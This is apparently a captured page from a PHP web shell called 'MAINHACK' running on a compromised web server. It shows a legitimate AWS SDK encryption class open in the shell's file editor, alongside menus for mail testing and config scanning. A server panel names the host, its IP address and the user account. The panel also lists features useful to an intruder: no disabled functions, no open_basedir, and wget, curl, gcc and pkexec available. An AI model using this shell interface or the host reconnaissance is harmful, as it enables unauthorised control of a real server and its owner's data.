[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: KmsMaterialsProvider.php
<?php namespace Aws\Crypto; use Aws\Kms\KmsClient; /** * Uses KMS to supply materials for encrypting and decrypting data. * * Legacy implementation that supports legacy S3EncryptionClient and * S3EncryptionMultipartUploader, which use an older encryption workflow. Use * KmsMaterialsProviderV2 with S3EncryptionClientV2 or * S3EncryptionMultipartUploaderV2 if possible. * * @deprecated */ class KmsMaterialsProvider extends MaterialsProvider implements MaterialsProviderInterface { const WRAP_ALGORITHM_NAME = 'kms'; private $kmsClient; private $kmsKeyId; /** * @param KmsClient $kmsClient A KMS Client for use encrypting and * decrypting keys. * @param string $kmsKeyId The private KMS key id to be used for encrypting * and decrypting keys. */ public function __construct( KmsClient $kmsClient, $kmsKeyId = null ) { $this->kmsClient = $kmsClient; $this->kmsKeyId = $kmsKeyId; } public function fromDecryptionEnvelope(MetadataEnvelope $envelope) { if (empty($envelope[MetadataEnvelope::MATERIALS_DESCRIPTION_HEADER])) { throw new \RuntimeException('Not able to detect the materials description.'); } $materialsDescription = json_decode( $envelope[MetadataEnvelope::MATERIALS_DESCRIPTION_HEADER], true ); if (empty($materialsDescription['kms_cmk_id']) && empty($materialsDescription['aws:x-amz-cek-alg'])) { throw new \RuntimeException('Not able to detect kms_cmk_id (legacy' . ' implementation) or aws:x-amz-cek-alg (current implementation)' . ' from kms materials description.'); } return new self( $this->kmsClient, isset($materialsDescription['kms_cmk_id']) ? $materialsDescription['kms_cmk_id'] : null ); } /** * The KMS key id for use in matching this Provider to its keys, * consistently with other SDKs as 'kms_cmk_id'. * * @return array */ public function getMaterialsDescription() { return ['kms_cmk_id' => $this->kmsKeyId]; } public function getWrapAlgorithmName() { return self::WRAP_ALGORITHM_NAME; } /** * Takes a content encryption key (CEK) and description to return an encrypted * key by using KMS' Encrypt API. * * @param string $unencryptedCek Key for use in encrypting other data * that itself needs to be encrypted by the * Provider. * @param string $materialDescription Material Description for use in * encrypting the $cek. * * @return string */ public function encryptCek($unencryptedCek, $materialDescription) { $encryptedDataKey = $this->kmsClient->encrypt([ 'Plaintext' => $unencryptedCek, 'KeyId' => $this->kmsKeyId, 'EncryptionContext' => $materialDescription ]); return base64_encode($encryptedDataKey['CiphertextBlob']); } /** * Takes an encrypted content encryption key (CEK) and material description * for use decrypting the key by using KMS' Decrypt API. * * @param string $encryptedCek Encrypted key to be decrypted by the Provider * for use decrypting other data. * @param string $materialDescription Material Description for use in * encrypting the $cek. * * @return string */ public function decryptCek($encryptedCek, $materialDescription) { $result = $this->kmsClient->decrypt([ 'CiphertextBlob' => $encryptedCek, 'EncryptionContext' => $materialDescription ]); return $result['Plaintext']; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.67 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002